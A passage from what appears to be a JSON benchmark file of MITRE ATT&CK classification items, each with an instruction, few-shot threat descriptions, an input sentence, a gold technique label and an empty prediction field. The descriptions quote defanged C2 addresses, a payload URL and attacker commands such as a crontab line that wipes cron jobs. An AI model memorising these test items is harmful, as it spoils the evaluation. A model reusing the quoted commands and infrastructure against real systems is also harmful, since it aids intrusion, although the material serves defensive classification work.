from four C2 servers at the following IP addresses: 185.203.118[.]198 145.249.105[.]165 188.241.58[.]170 109.248.148[.]42 These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves\n\t - T1105: Ingress Tool Transfer\n- Text: The main code is run in a separate thread: every 10 minutes, the application contacts the C&C server motivation[.]neighboring[.]site and passes it the computer's identifier in the User-Agent string. The identifier is a SuperFastHash of the system volume serial number and the name of the computer\n\t - T1082: System Information Discovery\n\t - T1029: Scheduled Transfer\n- Text: KGH_SPY can send a file containing victim system information to C2.\n\t - T1005: Data from Local System\n", + "input": "Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TajMahal has the ability to identify connected Apple devices.\n\t - T1120: Peripheral Device Discovery\n- Text: The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution\n\t - T1091: Replication Through Removable Media\n- Text: Aria-body has the ability to collect data from USB devices.\n\t - T1025: Data from Removable Media\n", + "input": "njRAT will attempt to detect if the victim system has a camera during the initial infection. njRAT can also detect any removable drives connected to the system.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: CHOPSTICK can switch to a new C2 channel if the current one is broken.\n\t - T1008: Fallback Channels\n- Text: Mustang Panda has encrypted C2 communications with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point\n\t - T1609: Container Administration Command\n- Text: Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.\n\t - T1613: Container and Resource Discovery\n- Text: TeamTNT has deployed privileged containers that mount the filesystem of victim machine.\n\t - T1611: Escape to Host\n", + "input": "TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.", + "gold": "- T1609: Container Administration Command", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: sets a WH_CBT Windows hook to collect information on process creation.\n\t - T1057: Process Discovery\n- Text: Ke3chang performs service discovery using \"net start\" commands.\n\t - T1007: System Service Discovery\n- Text: Egregor can enumerate all connected drives.\n\t - T1049: System Network Connections Discovery\n", + "input": "Turla surveys a system upon check-in to discover running processes using the \"tasklist /v\" command. Turla RPC backdoors have also enumerated processes associated with specific open ports or named pipes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte\n\t - T1560: Archive Collected Data\n- Text: ROKRAT can steal credentials stored in Web browsers by querying the sqlite database.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.\n\t - T1217: Browser Information Discovery\n", + "input": "Machete stores zipped files with profile data from installed web browsers.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Smoke Loader deobfuscates its code.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The archive contains a legitimate older version of Microsoft Word (Microsoft Word 2007) executable file that is named \u2018Noi dung chi tiet don khieu nai gui cong ty.exe\u2019 which translates to \u2018Learn more about how to use your company\u2019 in English. The attacker used the DLL side loading technique to load a malicious DLL by the older version of Microsoft Word. When opening the executable file in the archive, it loads the malicious DLL in the same directory. The DLL executes multi-stage shellcodes and each shellcode employs various technique to hide the next stage\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Attor's dispatcher can execute additional plugins by loading the respective DLLs.\n\t - T1129: Shared Modules\n", + "input": "gh0st RAT has decrypted and loaded the gh0st RAT DLL into memory, once the initial dropper executable is launched.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa can clear possible malware traces such as application logs.\n\t - T1070.002: Indicator Removal - Clear Linux or Mac System Logs\n- Text: Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: Rising Sun can modify file attributes to hide files.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Rocke has cleared log files within the /var/log/ folder.", + "gold": "- T1070.002: Indicator Removal - Clear Linux or Mac System Logs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy attempts to collect passwords from browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: ROKRAT can steal credentials by leveraging the Windows Vault mechanism.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n- Text: We suspect that the malware uses this extension to grab the victim\u2019s cookies and use them from another device to ride the victim\u2019s active session\n\t - T1539: Steal Web Session Cookie\n", + "input": "TA505 has used malware to gather credentials from Internet Explorer.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WellMail can identify the IP address of the victim system.\n\t - T1016: System Network Configuration Discovery\n- Text: LockBit 2.0 enumerates system information such as hostname, shares, and domain information.\n\t - T1082: System Information Discovery\n- Text: Mis-Type may create a file containing the results of the command \"cmd.exe /c net user {Username}\".\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "Moses Staff has collected the domain name of a compromised network.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: Indrik Spider has stored collected date in a .tmp file.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: H1N1 has functionality to copy itself to network shares.\n\t - T1080: Taint Shared Content\n", + "input": "Lokibot has the ability to copy itself to a hidden file and directory.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Blue Mockingbird has obfuscated the wallet address in the payload binary.\n\t - T1027: Obfuscated Files or Information\n", + "input": "Configuration data used by Rising Sun has been encrypted using an RC4 stream algorithm.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer can collect the IP address of a compromised host.\n\t - T1016: System Network Configuration Discovery\n- Text: Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception\n\t - T1049: System Network Connections Discovery\n\t - T1008: Fallback Channels\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n", + "input": "TrickBot obtains the IP address, location, and other relevant network information from the victim\u2019s machine.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crutch is able to bypass some security layers by abusing legitimate infrastructure \u2013 here Dropbox \u2013 in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Metamorfo has downloaded a zip file for execution on the system.\n\t - T1102.003: Web Service - One-Way Communication\n- Text: uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.\n\t - T1008: Fallback Channels\n", + "input": "CozyCar uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).\n\t - T1124: System Time Discovery\n- Text: SDBbot can collected the country code of a compromised machine.\n\t - T1614: System Location Discovery\n- Text: The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim\u2019s system\n\t - T1016: System Network Configuration Discovery\n\t - T1012: Query Registry\n", + "input": "FELIXROOT gathers the time zone information from the victim\u2019s machine.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware\n\t - T1204.002: User Execution - Malicious File\n- Text: On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account\n\t - T1204.002: User Execution - Malicious File\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n", + "input": "Agent Tesla has been executed through malicious e-mail attachments", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Depending on the Ramsay version, file collection won\u2019t be restricted to the local system drive, but also will search additional drives such as network or removable drives\n\t - T1039: Data from Network Shared Drive\n- Text: PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "BRONZE BUTLER has exfiltrated files stolen from file shares.", + "gold": "- T1039: Data from Network Shared Drive", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can use Windows Authentication Packages for persistence.\n\t - T1547.002: Boot or Logon Autostart Execution - Authentication Package\n- Text: No matching sample found for T1546.016\n- Text: PowerSploit's \"Install-SSP\" Persistence module can be used to establish by installing a SSP DLL.\n\t - T1547.005: Boot or Logon Autostart Execution - Security Support Provider\n", + "input": "Flame can use Windows Authentication Packages for persistence.", + "gold": "- T1547.002: Boot or Logon Autostart Execution - Authentication Package", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\\r\\n`.\n\t - T1016: System Network Configuration Discovery\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n- Text: An downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.\n\t - T1104: Multi-Stage Channels\n", + "input": "Bandook has a command to get the public IP address from a system.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014 the Linux kernel firewall \u2014 using the iptc_insert_entry() function from libiptc1 to allow output communication to it\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: binds and listens on port 1058.\n\t - T1571: Non-Standard Port\n", + "input": "BADCALL disables the Windows firewall before binding to a port.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.\n\t - T1608.002: Stage Capabilities - Upload Tool\n- Text: Threat Group-3390 has hosted malicious payloads on Dropbox.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: ZLib has the ability to download files.\n\t - T1105: Ingress Tool Transfer\n", + "input": "For C0010, UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.", + "gold": "- T1608.001: Stage Capabilities - Upload Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1083: File and Directory Discovery\n- Text: identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\t - T1135: Network Share Discovery\n- Text: QakBot can enumerate a list of installed programs.\n\t - T1518: Software Discovery\n", + "input": "Kimsuky has the ability to enumerate all files and directories on an infected system.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can use \"netstat\" to enumerate network connections.\n\t - T1049: System Network Connections Discovery\n- Text: Commands such as \"net view\" can be used in Net to gather information about available remote systems.\n\t - T1018: Remote System Discovery\n- Text: AdFind can enumerate domain users.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "Turla surveys a system upon check-in to discover active local network connections using the \"netstat -an\", \"net use\", \"net file\", and \"net session\" commands. Turla RPC backdoors have also enumerated the IPv4 TCP connection table via the \"GetTcpTable2\" API call.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tarrask may abuse the Windows schtasks command-line tool to create \"hidden\" scheduled tasks.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: 5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: allows actors to spawn a reverse shell on a victim.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "FELIXROOT executes batch scripts on the victim\u2019s machine, and can launch a reverse shell for command execution.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Last but not least, the malware creates an id, in the same way as seen in previous Zebrocy binaries. It retrieves the UserName via the GetUserNameW Windows API and prepends the volume serial number of the C:\\ drive\n\t - T1082: System Information Discovery\n- Text: CharmPower can list the installed applications on a compromised host.\n\t - T1518: Software Discovery\n- Text: performs the tasklist command to list running processes.\n\t - T1057: Process Discovery\n", + "input": "ShimRatReporter gathered the operating system name and specific Windows version of an infected machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Axiom has been observed using SQL injection to gain access to systems.\n\t - T1190: Exploit Public-Facing Application\n- Text: FormBook authors did some rewrites on the original exploit, taking as their initial codebase the one that we and Microsoft observed as deploying Cobalt Strike beacons. \u00a0The exploited vulnerability is CVE-2021-40444. However, since the vulnerability itself has been analyzed already, here we focus on describing some of the unique changes made by FormBook.\n\t - T1203: Exploitation for Client Execution\n- Text: Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n", + "input": "Moses Staff has exploited known 